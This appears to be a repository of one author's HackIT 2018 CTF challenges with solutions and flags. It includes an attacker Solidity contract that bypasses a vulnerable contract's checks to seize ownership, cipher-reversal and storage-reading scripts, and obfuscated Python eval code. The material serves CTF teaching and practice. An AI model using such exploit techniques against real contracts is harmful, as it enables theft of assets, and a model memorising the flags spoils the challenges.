├── .gitattributes ├── Bulwarck ├── README.md ├── bulwarck.sol └── solution │ ├── README.md │ └── solution.sol ├── Get Going ├── README.md ├── index.html └── solution │ └── README.md ├── Inves2gate ├── README.md ├── challenge-misc01.png └── solution │ └── README.md ├── README.md ├── Smartpher ├── README.md ├── message.txt ├── smartpher.bytecode └── solution │ ├── README.md │ ├── rotcustom.sol │ ├── smartpher.abi │ └── solve.py └── TrapOSaur ├── README.md ├── misc03.pyc └── solution └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /Bulwarck/README.md: -------------------------------------------------------------------------------- 1 | # Bulwarck 2 | 3 | ## Task Description : 4 | ``` 5 | We need to cross the bulwarck to get back control of our assets. Hope it's not too high for you. 
6 | 7 | Challenge: http://185.168.131.130:3000/ 8 | 9 | Submission Server: nc 185.168.131.130 1338 10 | 11 | Note: Please allow 5 minutes between solving and submission for flag 12 | ``` 13 | 14 | ## Tags: `Blockchain, EVM, Solidity` 15 | 16 | ### Level of difficulty: Medium-Hard 17 | 18 | ### Solve Stats : 19 | 1/670 registered team 20 | 21 | 1/123 team who scored atleast 1 point 22 | -------------------------------------------------------------------------------- /Bulwarck/bulwarck.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } -------------------------------------------------------------------------------- /Bulwarck/solution/README.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | 1.) Review the Source Code 4 | 5 | 2.) Create a `constructor` to execute exploit code to bypass `blooper` function 6 | 7 | 3.) 
Use another smart contract to call the challenge contract, so that `msg.sender != tx.origin` holds and the origin validation is bypassed 8 | 9 | 4.) Use the last 8 bits to bypass the other check. 10 | 11 | 5.) keccak("aaa","ppp") == keccak("aaap","pp") will always return TRUE, because in this Solidity version `keccak256` with several arguments hashes their tightly packed concatenation, so both calls hash the same bytes `aaappp`. That trick is utilized here to pass `check` with strings that differ from the stored `x` and `y`. 12 | 13 | 6.) Run the exploit code and you will become owner 14 | -------------------------------------------------------------------------------- /Bulwarck/solution/solution.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } 46 | 47 | contract Hack_Bulwarck { 48 | 49 | address public target = address; // Replace it 50 | bytes8 public _gateKey = bytes8(tx.origin) & 0xFFFFFFFF0000FFFF; 51 | string x="listen to man"; 52 | string y="yspeak to few"; 53 | constructor() 54 | { 55 | Bulwarck b = Bulwarck(target); 56 | b.jumpOver(_gateKey,x,y); 57 | } 58 | } -------------------------------------------------------------------------------- /Get Going/README.md: 
-------------------------------------------------------------------------------- 1 | # Get Going 2 | 3 | ### Task-Description: 4 | It is the content of index.html file 5 | 6 | ### Tags: `Steganography, Zero Width, Unicode` 7 | 8 | ### Difficulty : Easy-Medium 9 | 10 | ### Solution statistics: 11 | 65/123 teams who did atleast one point 12 | 65/670 overall teams 13 | -------------------------------------------------------------------------------- /Get Going/index.html: -------------------------------------------------------------------------------- 1 | W​​​​‏​‍​​​​‏‌‎​​​​‎‏‍​​​​‏​‎​​​​‏‏‎​​​​‏‎‏​​​​‍​‌​​​​‎‏​​​​​‏​‎​​​​‏‍‏​​​​‍​‌​​​​‍​‌​​​​‍‌​​​​​‎‏​​​​​‏​‏​​​​‍​‍​​​​‎‏‏​​​​‏‌‍​​​​‍​‌​​​​‏‍‏​​​​‏‏‍​​​​‎‏​​​​​‏‎‏​​​​‌‏‏​​​​‏‎‌​​​​‏​‏​​​​‎‏​​​​​‏‎‍​​​​‏‍​​​​​‌‏‏​​​​‎‏‏​​​​‌‏‎​​​​‏​​​​​​‍​‌​​​‌​​​elcome to the HackIT 2018 CTF, flag is somewhere here. ¯_(ツ)_/¯ 2 | -------------------------------------------------------------------------------- /Get Going/solution/README.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This concept is called 'Zero-Width Steganography' which has not been covered in any CTFs, There is a library for decoding https://github.com/offdev/zwsp-steg-js or can be manually decoded. 4 | There is nothing to guess, as Intention is players will open console & look at the ASCII text which isn't all ASCII but has unicode as well 5 | 6 | flag{w3_gr337_h4ck3rz_w1th_un1c0d3} 7 | -------------------------------------------------------------------------------- /Inves2gate/README.md: -------------------------------------------------------------------------------- 1 | # Inves2gate 2 | 3 | ### Task Description: 4 | ``` 5 | A trace of communication gave us this image. And also, we found some words like 'Rop$73N Network', 'Chopped em' & 'Peek my deployed contract'. 
Help us to make sense of all these findings 6 | Attachments: image 7 | ``` 8 | 9 | ### Tags : `EVM, Reverse Engineering` 10 | 11 | ### Difficulty: Medium 12 | 13 | ### Solution statistics: 14 | 3/670 overall teams 15 | 16 | 3/123 who had atleast 1 point 17 | 18 | -------------------------------------------------------------------------------- /Inves2gate/challenge-misc01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aadityapurani/My-CTF-Challenges/26fedac88ca647fef197ff62c6169534a10811cd/Inves2gate/challenge-misc01.png -------------------------------------------------------------------------------- /Inves2gate/solution/README.md: -------------------------------------------------------------------------------- 1 | Part 1: https://ropsten.etherscan.io/tx/0xb61227a91466026ea2f2670bd7725ac00bd7eb198ed71799ecadb6de3647f91e 2 | (flag{5cann1ng_) 3 | 4 | Part 2: https://ropsten.etherscan.io/tx/0xc02fc19b9c2587af1d1aab6aef9093f4b5fca6a0731e373ab4b584bb15a0170e 5 | (wh013_bl0ckch41n_4) 6 | 7 | Part 3: https://ropsten.etherscan.io/tx/0x1bc37a84ae691623c4043457fd3084044354ee656d349213fd63e5da1450ac9e 8 | The contract 0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a has storage which needs to be leaked 9 | web3.eth.getStorageAt('0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a', 1, function(x, y) {alert(web3.toAscii(y))}); 10 | (ctf_fl4g_i5_4_skill) 11 | 12 | Part 4: https://ropsten.etherscan.io/tx/0xd4e690ebfeabc1d61fabc2eda20df666633d9caf466f3e0dafdcc5616035df52 13 | https://ropsten.etherscan.io/address/0x0ea92008f4ccc6295e99908e35469fe9ca63787d 14 | web3.eth.getStorageAt('0x0ea92008f4ccc6295e99908e35469fe9ca63787d', 0, function(x, y) {alert(web3.toAscii(y))}); 15 | (_to_nuture}) 16 | 17 | overall : flag{5cann1ng_wh013_bl0ckch41n_4ctf_fl4g_i5_4_skill_to_nuture} -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | # My-CTF-Challenges 2 | 3 | Hi, I am Aaditya. This is the repo of CTF challenges I have authored. It contains challenge source code, explanation, author's intended solution & Task description along with statistics. 4 | 5 | I participate regularly in CTFs; currently under team `dcua`. Apart from that I do bug-hunting. My areas of interest/expertise are Web, mobile application, Forensics & Blockchain/Crypto. Most of my challenges are focused on those, but I like to challenge my comfort zone. If you have any questions about these challs, you can find me in the following ways: 6 | 7 | https://twitter.com/aaditya_purani 8 | 9 | https://aadityapurani.com 10 | 11 | 12 | ## Table of Contents: 13 | 14 | * [pbCTF 2022]() 15 | * [In The End](/) - Web, Pwn (2 solves) 16 | * [Lord of the Flag: The Unfinished Chat](https://github.com/perfectblue/pbCTF-2021-challs/tree/master/web/pbchat) - Web (0 solves) 17 | 18 | * [pbCTF 2021]() 19 | * [pbcoin](https://gist.github.com/aadityapurani/9cdec7360701c34d3ae2fdc1d1d7a0b4) - Blockchain (1 solve) 20 | 21 | * [UTC CTF 2019]() 22 | * Tons of Challenges 23 | 24 | * [HackIT CTF 2018]() 25 | * [Bulwarck](/Bulwarck) - Blockchain 26 | * [Get Going](/Get%20Going) - Steganography 27 | * [Smartpher](/Smartpher) - Blockchain 28 | * [Trap-O-Saur](/TrapOSaur) - Steganography 29 | * [Inves2Gate](/Inves2Gate) - Blockchain 30 | 31 | 32 | #### Give this repo a star if you like them 33 | -------------------------------------------------------------------------------- /Smartpher/README.md: -------------------------------------------------------------------------------- 1 | # Smartpher 2 | 3 | ### Task Description: 4 | ``` 5 | We found this attached in one of the Wooble's mail communication chain. Can you unBlock the Chain ? 
6 | 7 | Note: This challenge follows non-standard flag format, so use flag{...} before submitting 8 | ``` 9 | 10 | ### Tags: `EVM, RE` 11 | 12 | ### Difficulty : Hard 13 | 14 | ### Solution Statistics: 15 | 0/670 - Teams who registered 16 | 17 | 0/123 - Teams who scored at least 1 point 18 | -------------------------------------------------------------------------------- /Smartpher/message.txt: -------------------------------------------------------------------------------- 1 | Hi Wooble hackers, 2 | I wrote a super secure message encryption system to secure our communication so that FeeNetwork couldn't get our secret access to the chamber. 3 | The code to our secret chamber access code is given below which I generated from our system 4 | 5 | tphzqh}v}uivyznwju 6 | 7 | I combined blockchain and crypto to make double sure everything is good. I attach you other file, but I was too lazy to finish it though. Also, to access the chamber please decrypt the above access code and wrap with flag{...} 8 | 9 | Thanks, 10 | Wooble Team -------------------------------------------------------------------------------- /Smartpher/smartpher.bytecode: -------------------------------------------------------------------------------- 1 | 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 -------------------------------------------------------------------------------- /Smartpher/solution/README.md: -------------------------------------------------------------------------------- 1 | Step 1: Reverse the EVM file and figure out the encryption function. 2 | 3 | Step 2: Retrieve the SHA-1 hash of the seed and brute-force the seed, given that hash & seed.length == 4 4 | 5 | Step 3: Use solve.py, which implements the decryption routine, to retrieve the half-decrypted hash. 6 | 7 | Step 4: Now, implement the reverse of the custom ROT-19 encoding which the Solidity code implements. Using an online ROT-7 decoder will give a wrong decryption, as the author has tweaked the ROT-19 algorithm during the encryption process. 
8 | 9 | Step 5: Append the retrieved plain-text with flag{...} and submit to receive points 10 | 11 | Detailed explaination in solve.py file. 12 | 13 | flag{patiencepaaysineth} -------------------------------------------------------------------------------- /Smartpher/solution/rotcustom.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.4.24; 2 | 3 | contract rotcustom{ 4 | 5 | function rotDecryptionCustom(string text) view public returns(string) { 6 | uint256 length = bytes(text).length; 7 | for (var i = 0; i < length; i++) { 8 | byte char = bytes(text)[i]; 9 | assembly { 10 | char := byte(0,char) 11 | if and(gt(char,0x60), lt(char,0x6E)) 12 | { char:= add(0x7B, sub(char,0x61)) } 13 | if iszero(eq(char, 0x20)) 14 | {mstore8(add(add(text,0x20), mul(i,1)), sub(char,19))} 15 | } 16 | } 17 | return text; 18 | } 19 | 20 | } -------------------------------------------------------------------------------- /Smartpher/solution/smartpher.abi: -------------------------------------------------------------------------------- 1 | 
[{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Decrypt","outputs":[{"name":"","type":"bytes32"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"message","type":"bytes"}],"name":"laala","outputs":[{"name":"ret","type":"bytes20"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_seed","type":"string"}],"name":"setseed","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"feed","type":"bytes"}],"name":"aXeJ","outputs":[{"name":"","type":"bytes"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"x","type":"bytes20"}],"name":"bytes20ToString","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"zMx","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Crp","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"source","type":"string"}],"name":"stringToBytes","outputs":[{"name":"result","type":"bytes"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]); -------------------------------------------------------------------------------- /Smartpher/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ''' 3 | Implemented by Aaditya Purani (@aaditya_purani) 4 | There are three functions calling each both are encryption routine. 
5 | First function has in-memory array written in inline assembly 6 | In zMx function, it takes plain-text as input checks block.number == 12 7 | Encryption routine in zMx utilizes it and performs calculation along with memory arr 8 | Output is passed to Crp function, which has custom rot-19 implementation 9 | then it is feeded into aXeJ which takes input as bytes and perform require check with seed owner sets 10 | As this is static bytecode, seed cannot be retrieved from bytecode. So we want players to brute seed given sha1 hash & requirements 11 | seed should be exactly 4 length which is given out in one require(bytes(seed).length == 4); checks 12 | Then implement xor checks for aXeJ function 13 | Now, to decrypt implement in reverse given below 14 | ''' 15 | cipher = "tphzqh}v}uivyznwju" # Provided in message.txt 16 | len_cipher = len(cipher) 17 | offset = len_cipher - 2 18 | cipher = list(cipher) 19 | seed = "bcmz" # Must be retrieved by bruteforce of SHA-1 Hash provided in bytecode 4d64752cadde6ea019757e09ce374aa1bdba81df 20 | cipher[offset] = chr(ord(seed[0]) ^ ord(cipher[offset])^ ord(cipher[offset-2])) 21 | cipher[offset-4] = chr(ord(seed[2]) ^ ord(cipher[offset-4]) ^ ord(cipher[offset-8])) 22 | arr_num = [2, 24, 13, 17,8, 9, 10, 5, 3, 7] # Must be retrieved carefully from memory array 23 | blk_num = 12 24 | for i in xrange(0, len_cipher): 25 | cipher[i] = chr((ord(cipher[i])^arr_num[(i+3)%10])^(12)) 26 | print "".join(cipher) 27 | 28 | # Use the rotcustom.sol to decrypt it further -------------------------------------------------------------------------------- /TrapOSaur/README.md: -------------------------------------------------------------------------------- 1 | # Trap-O-Saur 2 | 3 | Python3.6 bytecode is given, Most likely players will try to RE the bytecode. After successful RE using uncompyle6 to python. Players will try to unobfuscate a code. 
4 | A critical section after unobfuscation 5 | 6 | ``` 7 | eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((+all([[]])))+')')+'e'+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str
(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+'('+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+')'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+
all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[e
val(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])+all([])))+str((+all([])))+')')+'['+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'s'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+a
ll([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'e'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all(
[])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval('str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+']'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(e
val)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')') 8 | ``` 9 | 10 | This is basically a pyfuck version of 11 | ``` 12 | \n\ndef f(x):\n x=['s','t','e','g','o']\n\n 13 | ``` 14 | 15 | There is a roulette function as well, but it is useless. As mentioned in the CTF, all flag formats are 'intact' unless otherwise mentioned in the description. 16 | Hence, players should not try `flag{stego}` or `stego`; it will give a wrong answer, as expected. But stego is the hint to proceed further. 17 | 18 | Python 3.6 bytecode has a peculiarity which can be abused to hide extra bytes in it without anyone noticing. In Python <= 3.5 instructions in the bytecode occupied either 1 or 3 bytes, depending on whether the opcode took an argument or not. In Python 3.6 this was changed so that all instructions occupy two bytes, which means an opcode that takes no argument still carries an argument byte that the interpreter ignores. 19 | 20 | Hence, we figure out how many extra bytes could be added in our pyc. There is also an implicit hint given in the challenge name `TrapOSaur`, which points to a tool known as `StegoSaurus` 21 | 22 | https://bitbucket.org/jherron/stegosaurus/overview 23 | 24 | After utilizing it, players will receive 